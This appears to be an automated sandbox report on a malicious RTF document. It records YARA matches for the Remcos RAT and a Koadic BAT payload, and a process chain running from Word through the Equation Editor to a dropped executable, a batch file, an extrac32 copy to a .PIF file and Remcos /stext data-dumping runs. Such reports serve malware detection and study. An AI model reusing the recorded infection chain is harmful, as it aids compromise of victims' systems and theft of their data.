                        Source: 00000018.00000002.471719434.0000000014E7B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000011.00000002.436864812.000000001588B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000019.00000002.496351890.00000000158EB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000009.00000002.848171681.00000000157EB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: C:\Users\Public\Libraries\RdxcjsngO.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drBinary or memory string: org.slneighbors
                        Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winRTF@29/24@30/4
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03237F8E GetDiskFreeSpaceA,5_2_03237F8E
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03246D84 CoCreateInstance,5_2_03246D84
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$hCyJ619J.rtfJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5FAC.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: .................................4C.....0......................._B.s.....4C.......4.t...........0.........................................0.....Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\ProgramData\Remcos\remcos.exeSystem information queried: HandleInformation
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\ProgramData\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 0000000E.00000002.417440907.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: OKhCyJ619J.rtfReversingLabs: Detection: 55%
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hjc.exe "C:\Users\user\AppData\Roaming\hjc.exe"
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" "
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\hjc.exe C:\\Users\\Public\\Libraries\\Rdxcjsng.PIF
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                        Source: unknownProcess created: C:\Users\Public\Libraries\Rdxcjsng.PIF "C:\Users\Public\Libraries\Rdxcjsng.PIF"
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj"
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\amas"
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\dgnkdwq"
                        Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm"
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\skxtebeuixrzqiq"
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cecmfupoefjdsweembv"
                        Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                        Source: unknownProcess created: C:\Users\Public\Libraries\Rdxcjsng.PIF "C:\Users\Public\Libraries\Rdxcjsng.PIF"
                        Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hjc.exe "C:\Users\user\AppData\Roaming\hjc.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" "Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\hjc.exe C:\\Users\\Public\\Libraries\\Rdxcjsng.PIFJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\amas"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\dgnkdwq"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\skxtebeuixrzqiq"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cecmfupoefjdsweembv"Jump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: wow64win.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: wow64cpu.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: archiveint.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: url.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ieframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: bcrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: eamsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: smartscreenps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: amsi.dllJump to behavior
